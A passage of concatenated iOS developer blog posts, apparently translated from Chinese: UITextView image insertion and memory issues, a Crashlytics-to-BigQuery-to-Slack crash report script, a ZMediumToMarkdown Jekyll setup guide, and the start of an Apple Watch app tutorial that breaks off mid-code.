+ attachment.bounds = CGRect(x: 0, y: 0, width: 30, height: 30)
+ attachment.image = UIImage(named: "IconError")
+ let combination = NSMutableAttributedString(attributedString: content)
+ combination.replaceCharacters(in: range, with: NSAttributedString(attachment: attachment))
+ // To remove directly, use deleteCharacters(in: range)
+ self.contentTextView.attributedText = combination
+ }
+ }
+ }
+}
+
After overcoming the above problem, the code will look like this:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+
class UploadImageNSTextAttachment:NSTextAttachment {
+ var uuid:String?
+}
+func dismissPhotoPicker(withTLPHAssets: [TLPHAsset]) {
+ // TLPhotoPicker image picker callback
+
+ let range = self.contentTextView.selectedRange.location ?? NSRange(location: 0, length: 0)
+ // Get the cursor position, if none, start from the beginning
+
+ guard withTLPHAssets.count > 0 else {
+ return
+ }
+
+ DispatchQueue.global().async { in
+ // Process in the background
+ let orderWithTLPHAssets = withTLPHAssets.sorted(by: { $0.selectedOrder > $1.selectedOrder })
+ orderWithTLPHAssets.forEach { (obj) in
+ if var image = obj.fullResolutionImage {
+
+ let id = UUID().uuidString
+
+ var maxWidth:CGFloat = 1500
+ var size = image.size
+ if size.width > maxWidth {
+ size.width = maxWidth
+ size.height = (maxWidth/image.size.width) * size.height
+ }
+ image = image.resizeTo(scaledToSize: size)
+ // Resize image
+
+ let attachment = UploadImageNSTextAttachment()
+ attachment.bounds = CGRect(x: 0, y: 0, width: size.width, height: size.height)
+ attachment.uuid = id
+
+ DispatchQueue.main.async {
+ // Switch back to the main thread to update the UI and insert the image
+ let combination = NSMutableAttributedString(attributedString: self.contentTextView.attributedText)
+ attachments.forEach({ (attachment) in
+ combination.insert(NSAttributedString(string: "\n"), at: range)
+ combination.insert(NSAttributedString(attachment: attachment), at: range)
+ combination.insert(NSAttributedString(string: "\n"), at: range)
+ })
+ self.contentTextView.attributedText = combination
+
+ }
+
+ // Upload image to server
+ // Alamofire post or....
+ // POST image
+ // if failed {
+ if let content = self.contentTextView.attributedText {
+ content.enumerateAttributes(in: NSMakeRange(0, content.length), options: NSAttributedString.EnumerationOptions(rawValue: 0)) { (object, range, stop) in
+
+ if object.keys.contains(NSAttributedStringKey.attachment) {
+ if let attachment = object[NSAttributedStringKey.attachment] as? UploadImageNSTextAttachment,attachment.uuid == obj.key {
+
+ // REPLACE:
+ attachment.bounds = CGRect(x: 0, y: 0, width: 30, height: 30)
+ attachment.image = // ERROR Image
+ let combination = NSMutableAttributedString(attributedString: content)
+ combination.replaceCharacters(in: range, with: NSAttributedString(attachment: attachment))
+ // OR DELETE:
+ // combination.deleteCharacters(in: range)
+
+ self.contentTextView.attributedText = combination
+ }
+ }
+ }
+ }
+ //}
+ //
+
+ }
+ }
+ }
+}
+
By now, most of the issues have been resolved. So, what troubled me for two weeks?
Answer: “Memory” issues
iPhone 6 can’t handle it!
When inserting more than 5 images using the above method, UITextView starts to lag; at a certain point, the app crashes due to memory overload.
p.s. Tried various compression/other storage methods, but the result was the same.
The suspected reason is that UITextView does not reuse NSTextAttachment for images, so all inserted images are loaded into memory and not released. Unless you’re inserting small images like emojis 😅, you can’t use it for text wrapping around images.
After discovering this “hard” memory issue, I continued searching online for solutions and found the following alternatives:
<div contentEditable="true"></div>
) and interact with WebView using JS.The first method of embedding an HTML file in WebView was not considered due to performance and user experience concerns. Interested friends can search for related solutions on GitHub (e.g., RichTextDemo).
The second method of using UITableView combined with UITextView:
I implemented about 70% of it. Specifically, each line is a Cell, with two types of Cells: one for UITextView and one for UIImageView, with one line for text and one line for images. The content must be stored in an array to avoid disappearing during reuse.
This method excellently solves the memory issue through reuse, but I eventually gave up due to the difficulty in controlling creating a new line and jumping to it when pressing Return at the end of a line and jumping to the previous line when pressing Backspace at the beginning of a line (and deleting the current line if it’s empty). These parts were very hard to control.
Interested friends can refer to: MMRichTextEdit.
By this point, a lot of time had been spent, and the development schedule was severely delayed. The final solution was to use TextKit.
Here are two articles for friends interested in researching further:
However, there is a certain learning curve, which was too difficult for a novice like me. Moreover, time was running out, so I aimlessly searched GitHub for solutions.
Finally, I found XLYTextKitExtension, which can be directly imported and used.
✔ Allows NSTextAttachment to support custom UIViews, enabling any interactive operations.
✔ NSTextAttachment can be reused without exhausting memory.
The specific implementation is similar to Chapter 1, except that NSTextAttachment is replaced with XLYTextAttachment.
For the UITextView to be used:
1
+
contentTextView.setUseXLYLayoutManager()
+
Tip 1: Change the insertion of NSTextAttachment to:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
let combine = NSMutableAttributedString(attributedString: NSAttributedString(string: ""))
+let imageView = UIView() // your custom view
+let imageAttachment = XLYTextAttachment { () -> UIView in
+ return imageView
+}
+imageAttachment.id = id
+imageAttachment.bounds = CGRect(x: 0, y: 0, width: size.width, height: size.height)
+combine.append(NSAttributedString(attachment: imageAttachment))
+self.contentTextView.textStorage.insert(combine, at: range)
+
Tip 2: Search for NSTextAttachment and replace with
1
+2
+3
+4
+5
+
self.contentTextView.textStorage.enumerateAttribute(NSAttributedStringKey.attachment, in: NSRange(location: 0, length: self.contentTextView.textStorage.length), options: []) { (value, range, stop) in
+ if let attachment = value as? XLYTextAttachment {
+ //attachment.id
+ }
+}
+
Tip 3: Delete NSTextAttachment item and replace with
1
+
self.contentTextView.textStorage.deleteCharacters(in: range)
+
Tip 4: Get the current content length
1
+
self.contentTextView.textStorage.length
+
Tip 5: Refresh the Bounds size of the Attachment
The main reason is for user experience; when inserting an image, I will first insert a loading image, and the inserted image will be replaced after being compressed in the background. The Bounds of the TextAttachment need to be updated to the resized size.
1
+
self.contentTextView.textStorage.addAttributes([:], range: range)
+
(Add empty attributes to trigger refresh)
Tip 6: Convert input content into transmittable text
Use Tip 2 to search all input content and extract the IDs of the found Attachments, combining them into a format like [ [ID] ] for transmission.
Tip 7: Content replacement
1
+
self.contentTextView.textStorage.replaceCharacters(in: range, with: NSAttributedString(attachment: newImageAttachment))
+
Tip 8: Use regular expressions to match the range of content
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
let pattern = "(\\[\\[image_id=){1}([0-9]+){1}(\\]\\]){1}"
+let textStorage = self.contentTextView.textStorage
+
+if let regex = try? NSRegularExpression(pattern: pattern, options: .caseInsensitive) {
+ while true {
+ let range = NSRange(location: 0, length: textStorage.length)
+ if let match = regex.matches(in: textStorage.string, options: .withTransparentBounds, range: range).first {
+ let matchString = textStorage.attributedSubstring(from: match.range)
+ //FINDED!
+ } else {
+ break
+ }
+ }
+}
+
Note: If you need to search & replace items, you need to use a While loop. Otherwise, when there are multiple search results, after finding and replacing the first one, the range of the subsequent search results will be incorrect, causing a crash.
Currently, I have completed the product using this method and it is online without any issues; I will explore the principles behind it when I have time!
This article is more of a personal problem-solving experience sharing rather than a tutorial; if you are implementing similar functionality, I hope it helps you. Feel free to contact me with any questions or feedback.
The first official post on Medium
Feel free to contact me with any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Integrating Crashlytics and Big Query to automatically forward crash records to a Slack Channel
Pinkoi iOS Team Real Photo
First, let’s look at the results. We query Crashlytics crash records regularly every week; filter out the top 10 issues with the most crashes; and send the information to a Slack Channel, making it convenient for all iOS teammates to quickly understand the current stability.
For app developers, the Crash-Free Rate can be said to be the most important metric; the data represents the proportion of app users who did not encounter crashes. I think every app would hope its Crash-Free Rate ~= 99.9%; but the reality is that it’s impossible. As long as there is code, there can be bugs, not to mention some crashes are caused by underlying issues (Apple) or third-party SDKs. Additionally, the DAU (Daily Active Users) volume can also impact the Crash-Free Rate. The higher the DAU, the more likely it is to encounter many sporadic crash issues.
Since a 100% crash-free app does not exist, tracking and handling crashes becomes very important. Besides the most common Google Firebase Crashlytics (formerly Fabric), there are other options like Bugsnag and Bugfender. I haven’t compared these tools personally, so interested friends can research on their own. If you use other tools, the content introduced in this article won’t be applicable.
The benefits of choosing Crashlytics are:
Side note: It is not recommended to build a formal service entirely on Firebase, as the charges can become very expensive once the traffic increases… it’s a trap.
Crashlytics also has many drawbacks:
The most painful part is the poor support and flexibility of Integrations, coupled with the lack of an API to write scripts to connect crash data. This means you have to manually check Crashlytics for crash records from time to time to track crash issues.
The content and rules of the above Integrations cannot be customized.
Initially, we directly used 2. New Fatal Issue to Slack or Email, and for Email, we used Google Apps Script to trigger subsequent processing scripts; however, this notification would bombard the notification channel crazily, because it would notify for any issue, big or small, or even sporadic crashes caused by user devices or iOS itself. As DAU increased, we were bombarded by these notifications every day, and only about 10% of them were truly valuable, related to our program errors, and encountered by many users.
As a result, it did not solve the problem of Crashlytics being difficult to track automatically, and we still had to spend a lot of time reviewing whether the issue was important.
After searching around, we only found this method, and the official also only provides this method; this is the trap under the free candy coating. I guess neither Crashlytics nor Analytics Event will or plan to launch an API for users to query data via API; because the only official suggestion is to import the data into Big Query for use, and Big Query charges for storage and queries beyond the free quota.
Storage: The first 10 GB per month is free.
Query: The first 1 TB per month is free. (The query quota means how much data is processed when you run a Select query)
For details, refer to Big Query pricing.
The setup details for Crashlytics to Big Query can be found in the official documentation, which requires enabling GCP services, binding a credit card, etc.
After setting up the Crashlytics Log to Big Query import cycle and completing the first import with data, we can start querying the data.
First, go to Firebase Project -> Crashlytics -> Click the “•••” in the top right corner of the list -> Click “BigQuery dataset”.
After going to GCP -> Big Query, you can select “firebase_crashlytics” in the left “Explorer” -> select your Table name -> “Detail” -> You can view the Table information on the right, including the latest modification time, used capacity, storage period, etc.
Make sure there is imported data available for querying.
You can switch to the “SCHEMA” tab at the top to view the Table’s column information or refer to the official documentation.
Click the “Query” button in the top right to open an interface with an assisted SQL Builder (if you are not familiar with SQL, it is recommended to use this):
Or directly click “COMPOSE NEW QUERY” to open a blank Query Editor:
Regardless of the method, it is the same text editor; after entering the SQL, you can automatically complete the SQL syntax check and estimate the query quota cost in the top right (This query will process XXX when run.
):
After confirming the query, click “RUN” in the top left to execute the query, and the results will be displayed in the Query results section below.
⚠️ Pressing “RUN” to execute the query will accumulate the query quota and incur charges; so please be careful not to run queries recklessly.
1. Count the number of crashes per day for the past 30 days:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
SELECT
+ COUNT(DISTINCT event_id) AS number_of_crashes,
+ FORMAT_TIMESTAMP("%F", event_timestamp) AS date_of_crashes
+FROM
+ `yourProjectID.firebase_crashlytics.yourTableName`
+GROUP BY
+ date_of_crashes
+ORDER BY
+ date_of_crashes DESC
+LIMIT 30;
+
2. Query the top 10 most frequent crashes in the past 7 days:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
SELECT
+ DISTINCT issue_id,
+ COUNT(DISTINCT event_id) AS number_of_crashes,
+ COUNT(DISTINCT installation_uuid) AS number_of_impacted_user,
+ blame_frame.file,
+ blame_frame.line
+FROM
+ `yourProjectID.firebase_crashlytics.yourTableName`
+WHERE
+ event_timestamp >= TIMESTAMP_SUB(CURRENT_TIMESTAMP(),INTERVAL 168 HOUR)
+ AND event_timestamp < CURRENT_TIMESTAMP()
+GROUP BY
+ issue_id,
+ blame_frame.file,
+ blame_frame.line
+ORDER BY
+ number_of_crashes DESC
+LIMIT 10;
+
However, the data retrieved using this official example is sorted differently from what you see in Crashlytics. This is likely because it groups by blame_frame.file (nullable) and blame_frame.line (nullable).
3. Query the top 10 devices with the most crashes in the past 7 days:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
SELECT
+ device.model,
+COUNT(DISTINCT event_id) AS number_of_crashes
+FROM
+ `yourProjectID.firebase_crashlytics.yourTableName`
+WHERE
+ event_timestamp >= TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 168 HOUR)
+ AND event_timestamp < CURRENT_TIMESTAMP()
+GROUP BY
+ device.model
+ORDER BY
+ number_of_crashes DESC
+LIMIT 10;
+
For more examples, please refer to the official documentation.
If your SQL query returns no data, first ensure that the Crashlytics data for the specified conditions has been imported into Big Query (for example, the default SQL example queries the crash records of the day, but the data might not have been synchronized yet, so no results are found); if there is data, then check whether the filter conditions are correct.
Here, we modify the official example from point 2. We want the results to match the crash issues and sorting data we see on the first page of Crashlytics.
Top 10 crash issues in the past 7 days:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+
SELECT
+ DISTINCT issue_id,
+ issue_title,
+ issue_subtitle,
+ COUNT(DISTINCT event_id) AS number_of_crashes,
+ COUNT(DISTINCT installation_uuid) AS number_of_impacted_user
+FROM
+ `yourProjectID.firebase_crashlytics.yourTableName`
+WHERE
+ is_fatal = true
+ AND event_timestamp >= TIMESTAMP_SUB(
+ CURRENT_TIMESTAMP(),
+ INTERVAL 7 DAY
+ )
+GROUP BY
+ issue_id,
+ issue_title,
+ issue_subtitle
+ORDER BY
+ number_of_crashes DESC
+LIMIT
+ 10;
+
Comparison of Crashlytics’ Top 10 crash issues results, matched ✅.
Go to Google Apps Script homepage -> Log in with the same account as Big Query -> Click “New Project” in the upper left corner, and you can rename the project after opening a new project.
Refer to the official documentation example, and bring in the above Query SQL.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+
function queryiOSTop10Crashes() {
+ var request = {
+ query: 'SELECT DISTINCT issue_id, issue_title, issue_subtitle, COUNT(DISTINCT event_id) AS number_of_crashes, COUNT(DISTINCT installation_uuid) AS number_of_impacted_user FROM `firebase_crashlytics.YourTableName` WHERE is_fatal = true AND event_timestamp >= TIMESTAMP_SUB( CURRENT_TIMESTAMP(), INTERVAL 7 DAY ) GROUP BY issue_id, issue_title, issue_subtitle ORDER BY number_of_crashes DESC LIMIT 10;',
+ useLegacySql: false
+ };
+ var queryResults = BigQuery.Jobs.query(request, 'YourProjectID');
+ var jobId = queryResults.jobReference.jobId;
+
+ // Check on status of the Query Job.
+ var sleepTimeMs = 500;
+ while (!queryResults.jobComplete) {
+ Utilities.sleep(sleepTimeMs);
+ sleepTimeMs *= 2;
+ queryResults = BigQuery.Jobs.getQueryResults(projectId, jobId);
+ }
+
+ // Get all the rows of results.
+ var rows = queryResults.rows;
+ while (queryResults.pageToken) {
+ queryResults = BigQuery.Jobs.getQueryResults(projectId, jobId, {
+ pageToken: queryResults.pageToken
+ });
+ Logger.log(queryResults.rows);
+ rows = rows.concat(queryResults.rows);
+ }
+
+ var data = new Array(rows.length);
+ for (var i = 0; i < rows.length; i++) {
+ var cols = rows[i].f;
+ data[i] = new Array(cols.length);
+ for (var j = 0; j < cols.length; j++) {
+ data[i][j] = cols[j].v;
+ }
+ }
+
+ return data
+}
+
query: The parameters can be arbitrarily replaced with the written Query SQL.
The structure of the returned object is as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+
[
+ [
+ "67583e77da3b9b9d3bd8feffeb13c8d0",
+ "<compiler-generated> line 2147483647",
+ "specialized @nonobjc NSAttributedString.init(data:options:documentAttributes:)",
+ "417",
+ "355"
+ ],
+ [
+ "a590d76bc71fd2f88132845af5455c12",
+ "libnetwork.dylib",
+ "nw_endpoint_flow_copy_path",
+ "259",
+ "207"
+ ],
+ [
+ "d7c3b750c3e5587c91119c72f9f6514d",
+ "libnetwork.dylib",
+ "nw_endpoint_flow_copy_path",
+ "138",
+ "118"
+ ],
+ [
+ "5bab14b8f8b88c296354cd2e",
+ "CoreFoundation",
+ "-[NSCache init]",
+ "131",
+ "117"
+ ],
+ [
+ "c6ce52f4771294f9abaefe5c596b3433",
+ "XXX.m line 975",
+ "-[XXXX scrollToMessageBottom]",
+ "85",
+ "57"
+ ],
+ [
+ "712765cb58d97d253ec9cc3f4b579fe1",
+ "<compiler-generated> line 2147483647",
+ "XXXXX.heightForRow(at:tableViewWidth:)",
+ "67",
+ "66"
+ ],
+ [
+ "3ccd93daaefe80f024cc8a7d0dc20f76",
+ "<compiler-generated> line 2147483647",
+ "XXXX.tableView(_:cellForRowAt:)",
+ "59",
+ "59"
+ ],
+ [
+ "f31a6d464301980a41367b8d14f880a3",
+ "XXXX.m line 46",
+ "-[XXXX XXX:XXXX:]",
+ "50",
+ "41"
+ ],
+ [
+ "c149e1dfccecff848d551b501caf41cc",
+ "XXXX.m line 554",
+ "-[XXXX tableView:didSelectRowAtIndexPath:]",
+ "48",
+ "47"
+ ],
+ [
+ "609e79f399b1e6727222a8dc75474788",
+ "Pinkoi",
+ "specialized JSONDecoder.decode<A>(_:from:)",
+ "47",
+ "38"
+ ]
+]
+
You can see it is a two-dimensional array.
Continue adding the new function below the above code.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+
function sendTop10CrashToSlack() {
+
+ var iOSTop10Crashes = queryiOSTop10Crashes();
+ var top10Tasks = new Array();
+
+ for (var i = 0; i < iOSTop10Crashes.length ; i++) {
+ var issue_id = iOSTop10Crashes[i][0];
+ var issue_title = iOSTop10Crashes[i][1];
+ var issue_subtitle = iOSTop10Crashes[i][2];
+ var number_of_crashes = iOSTop10Crashes[i][3];
+ var number_of_impacted_user = iOSTop10Crashes[i][4];
+
+ var strip_title = issue_title.replace(/[\<|\>]/g, '');
+ var strip_subtitle = issue_subtitle.replace(/[\<|\>]/g, '');
+
+ top10Tasks.push("<https://console.firebase.google.com/u/1/project/YOUR_FIREBASE_PROJECTID/crashlytics/app/YOUR_FIREBASE_APP_PROJECT_ID/issues/"+issue_id+"|"+(i+1)+". Crash: "+number_of_crashes+" times ("+number_of_impacted_user+" users) - "+strip_title+" "+strip_subtitle+">");
+ }
+
+ var messages = top10Tasks.join("\n");
+ var payload = {
+ "blocks": [
+ {
+ "type": "header",
+ "text": {
+ "type": "plain_text",
+ "text": ":bug::bug::bug: iOS Top 10 Crashes in the Last 7 Days :bug::bug::bug:",
+ "emoji": true
+ }
+ },
+ {
+ "type": "divider"
+ },
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": messages
+ }
+ },
+ {
+ "type": "divider"
+ },
+ {
+ "type": "actions",
+ "elements": [
+ {
+ "type": "button",
+ "text": {
+ "type": "plain_text",
+ "text": "View Last 7 Days in Crashlytics",
+ "emoji": true
+ },
+ "url": "https://console.firebase.google.com/u/1/project/YOUR_FIREBASE_PROJECTID/crashlytics/app/YOUR_FIREBASE_APP_PROJECT_ID/issues?time=last-seven-days&state=open&type=crash&tag=all"
+ },
+ {
+ "type": "button",
+ "text": {
+ "type": "plain_text",
+ "text": "View Last 30 Days in Crashlytics",
+ "emoji": true
+ },
+ "url": "https://console.firebase.google.com/u/1/project/YOUR_FIREBASE_PROJECTID/crashlytics/app/YOUR_FIREBASE_APP_PROJECT_ID/issues?time=last-thirty-days&state=open&type=crash&tag=all"
+ }
+ ]
+ },
+ {
+ "type": "context",
+ "elements": [
+ {
+ "type": "plain_text",
+ "text": "Crash counts and versions are only counted for the last 7 days, not all data.",
+ "emoji": true
+ }
+ ]
+ }
+ ]
+ };
+
+ var slackWebHookURL = "https://hooks.slack.com/services/XXXXX"; //Replace with your in-coming webhook URL
+ UrlFetchApp.fetch(slackWebHookURL,{
+ method : 'post',
+ contentType : 'application/json',
+ payload : JSON.stringify(payload)
+ })
+}
+
If you don’t know how to obtain the incoming WebHook URL, you can refer to the “Obtaining Incoming WebHooks App URL” section in this article.
At this point, your Google Apps Script project should have the above two functions.
Next, please select the “sendTop10CrashToSlack” function at the top, and then click Debug or Run to execute a test run; since the first execution requires authentication, please execute it at least once before proceeding to the next step.
After successfully executing a test run, you can start setting up the schedule for automatic execution:
Select the clock icon on the left, then choose “+ Add Trigger” at the bottom right.
For the first “Choose which function to run” (entry point of the function to be executed), change it to sendTop10CrashToSlack
. The time period can be set according to personal preference.
⚠️⚠️⚠️ Please be aware that each query will accumulate and incur charges, so do not set it up carelessly; otherwise, you might end up bankrupt due to automatic scheduling.
Example Result Image
From now on, you can quickly track the current app crash issues on Slack; you can even discuss them directly there.
If you want to track the App Crash-Free Users Rate, you can refer to the next article “Crashlytics + Google Analytics Automatic Query for App Crash-Free Users Rate”
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Move your Medium posts to a Jekyll blog and keep them in sync in the future.
This tool can help you move your Medium posts to a Jekyll blog and keep them in sync in the future.
It will automatically download your posts from Medium, convert them to Markdown, and upload them to your repository, check out my blog for online demo zhgchg.li .
One-time setting, Lifetime enjoying❤️
Powered by ZMediumToMarkdown .
If you only want to create a backup or auto-sync of your Medium posts, you can use the GitHub Action directly by following the instructions in this Wiki .
Use this template
located above and select Create a new repository
..github.io
, for example, my organization name is zhgchgli
then it’ll be zhgchgli.github.io
.public
repository option, and then click on Create repository from template
.Settings
tab in your GitHub repository, selecting Actions
-> General
, and finding the Workflow permissions section
, then, select Read and write permissions
, and click on Save
to save the changes.*If you choose a different Repository Name, the GitHub page will be https://username.github.io/Repository Name
instead of https://username.github.io/
, and you will need to fill in the baseurl
field in _config.yml
with your Repository Name.
*If you are using an organization and cannot enable Read and Write permissions
in the repository settings, please refer to the organization settings page and enable it there.
_zmediumtomarkdown.yml
file.Automatic Build
and pages-build-deployment
GitHub actions to finish before making any further changes.Actions
tab in your GitHub repository, selecting the ZMediumToMarkdown
action, clicking on the Run workflow
button, and selecting the main
branch.Automatic Build
and pages-build-deployment
actions will also need to finish before making any further changes, and that they will start automatically once the ZMediumToMarkdown action has completed.Settings
section of your GitHub repository and select Pages
. In the Branch
field, select gh-pages
, and leave /(root)
selected as the default. Click Save
, you can also find the URL for your GitHub page at the top of the page.Pages build and deployment
action to finish.*To avoid expected Git conflicts or unexpected errors, please follow the steps carefully and in order, and be patient while waiting for each action to complete.
*Note that the first time running may take longer.
*If you open the URL and notice that something is wrong, such as the web style being missing, please ensure that your configuration in the _config.yml
file is correct.
*Please refer to the ‘Things to Know’ and ‘Troubleshooting’ sections below for more information.
1
+
medium_username: # enter your username on Medium.com
+
Please specify your Medium username for automatic download and syncing of your posts.
For more information, please refer to jekyll-theme-chirpy or jekyllrb .
You can configure the time interval for syncing in ./.github/workflows/ZMediumToMarkdown.yml
.
The default time interval for syncing is once per day.
You can also manually run the ZMediumToMarkdown action by going to the Actions
tab in your GitHub repository, selecting the ZMediumToMarkdown
action, clicking on the Run workflow
button, and selecting the main
branch.
All content downloaded using ZMediumToMarkdown, including but not limited to articles, images, and videos, are subject to copyright laws and belong to their respective owners. ZMediumToMarkdown does not claim ownership of any content downloaded using this tool.
Downloading and using copyrighted content without the owner’s permission may be illegal and may result in legal action. ZMediumToMarkdown does not condone or support copyright infringement and will not be held responsible for any misuse of this tool.
Users of ZMediumToMarkdown are solely responsible for ensuring that they have the necessary permissions and rights to download and use any content obtained using this tool. ZMediumToMarkdown is not responsible for any legal issues that may arise from the misuse of this tool.
By using ZMediumToMarkdown, users acknowledge and agree to comply with all applicable copyright laws and regulations.
Pages build and deployment
and Automatic Build
actions, you can check the progress on the Actions
tab.Settings -> Pages
.ZMediumToMarkdown
GitHub Action for syncing Medium posts will automatically run every day by default, and you can also manually trigger it on the GitHub Actions page or adjust the sync frequency as needed.Automatic Build
& Pages build and deployment
action. Please wait for this action to finish before checking the final result._posts
directory by naming the file as YYYY-MM-DD-POSTNAME
and recommend using lowercase file names./assets
directory.tools/optimize_markdown.rb
and uncomment lines 10–12
. This will automatically remove the ZMediumToMarkdown watermark at the end of all posts during Jekyll build time.If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Step-by-step development of an Apple Watch App from scratch with watchOS 5
It’s been almost three months since my last Apple Watch Unboxing, and I finally found the opportunity to explore developing an Apple Watch App.
Wedding App — The Largest Wedding Planning App
Here are my thoughts after using it for three months:
Overall, after three months of use, it still feels like a little life assistant, helping you with trivial matters, just as I wrote in the original unboxing article.
Before I actually developed an Apple Watch App, I was puzzled as to why the apps on Apple Watch were so basic, even just “usable,” including LINE (messages not synced and never updated), Messenger (just usable); until I actually developed an Apple Watch App and understood the developers’ difficulties…
The positioning of the Apple Watch is “not to replace the iPhone, but to assist”. This is the direction of official introductions, official apps, and watchOS APIs; hence, third-party apps feel basic and have limited functionality (sorry, I was too greedy Orz).
Take our app as an example, it has features like searching for vendors, viewing columns, discussion forums, online inquiries, etc.; online inquiries are valuable to bring to the Apple Watch because they require real-time and faster responses, which increases the chance of getting orders. Searching for vendors, viewing columns, and discussion forums are relatively complex features, and even if they can be done on the watch, it doesn’t make much sense (the screen can display too little information, and they don’t require real-time responses).
The core concept is still “assistive,” so not every feature needs to be brought to the Apple Watch; after all, users rarely have only the watch without the phone, and in such cases, the user’s needs are only for important features (like viewing column articles, which is not important enough to need to be viewed immediately on the watch).
This is also my first time developing an Apple Watch App, the content of the article may not be in-depth enough, please give me your advice!!
This article is only suitable for readers who have developed iOS Apps/UIKit basics
This article uses: iOS ≥ 9, watchOS ≥ 5
File -> New -> Target -> watchOS -> WatchKit App
*Apple Watch Apps cannot be installed independently, they must be attached to an iOS App
After creating it, the directory will look like this:
You will find two Target items, both indispensable:
Details will be introduced later, for now, just get a general understanding of the directory and file content functions.
In Apple Watch, the view controller is not called ViewController but InterfaceController. You can find the Interface Controller Scene in WatchKit App/Interface.storyboard, and the program that controls it is in WatchKit Extension/InterfaceController.swift (same concept as iOS)
The Scene is initially squeezed together with the Notification Controller Scene (I will pull it up a bit to separate them)
You can set the title display text of the InterfaceController on the right.
The title color part is set by Interface Builder Document/Global hint, the style color of the entire App will be unified.
There are not many complex components, and the functions of the components are simple and clear.
A tall building starts from the View. The layout part does not have Auto Layout, constraints, or layers like in UIKit (iOS). All layout settings are done using parameters, which is simpler and more powerful (the layout is somewhat like UIStackView in UIKit).
All layouts are composed of Groups, similar to UIStackView in UIKit but with more layout parameters
Group parameter settings:
You can directly apply the system’s Text Styles or use Custom (but I found that using Custom couldn’t set the font size); so I used System to customize the font size for each display Label.
The layout is not as complicated as iOS, so I’ll demonstrate it directly through an example for you to get started quickly; using Line’s homepage layout as an example:
In WatchKit App/Interface.storyboard, find the Interface Controller Scene:
Like UIKit UITableView, there is the Table itself and the Cell (called Row in Apple Watch); it is much simpler to use, you can directly design the layout of the Cell in this interface!
To create a layout with a rounded full-width Image on the left and a stacked Label, and two evenly divided blocks on the right, with a Label on the top and another Label on the bottom.
2-1: Create the structure of the left and right blocks
Drag two Groups into the Group and set the Size parameters respectively:
Left green part:
Layout setting Overlap, the sub-View inside needs to stack the unread message Label
Set a fixed square with a width and height of 40
Right red part:
Layout setting Vertical, the sub-View inside needs to display two items vertically
Width setting refers to the outer layer, 100% ratio, minus the 40 of the left green part
Layout inside the left and right containers:
Left part: Drag in an Image, then drag in a Group containing a Label and align it to the bottom right (set the Group background color, spacing, and rounded corners)
Right part: Drag in two Labels, one aligned to the top left and the other aligned to the bottom left.
Select Row -> Identifier -> Enter custom name
Very simple, just drag another Row into the Table (which Row style to display is controlled by the program) and enter the Identifier name.
Here I drag another Row for displaying a no data prompt.
WatchKit’s hidden does not occupy space, it can be used for interactive applications (display Table when logged in; display prompt Label when not logged in).
The layout is now complete, you can modify it according to your design; it’s easy to get started, practice a few more times, and play with the alignment parameters to get familiar!
Continuing with Row, we need to create a Class to reference the Row:
1
+2
+
class ContactRow:NSObject {
+}
+
1
+2
+3
+4
+5
+6
+7
+8
+
class ContactRow:NSObject {
+ var id:String?
+ @IBOutlet var unReadGroup: WKInterfaceGroup!
+ @IBOutlet var unReadLabel: WKInterfaceLabel!
+ @IBOutlet weak var imageView: WKInterfaceImage!
+ @IBOutlet weak var nameLabel: WKInterfaceLabel!
+ @IBOutlet weak var timeLabel: WKInterfaceLabel!
+}
+
Pull outlets, store variables
For the Table part, also pull the Outlet to the Controller:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+
class InterfaceController: WKInterfaceController {
+
+ @IBOutlet weak var Table: WKInterfaceTable!
+ override func awake(withContext context: Any?) {
+ super.awake(withContext: context)
+
+ // Configure interface objects here.
+ }
+
+ override func willActivate() {
+ // This method is called when watch view controller is about to be visible to user
+ super.willActivate()
+ }
+
+ struct ContactStruct {
+ var name:String
+ var image:String
+ var time:String
+ }
+
+ func loadData() {
+ //Get API Call Back...
+ //postData {
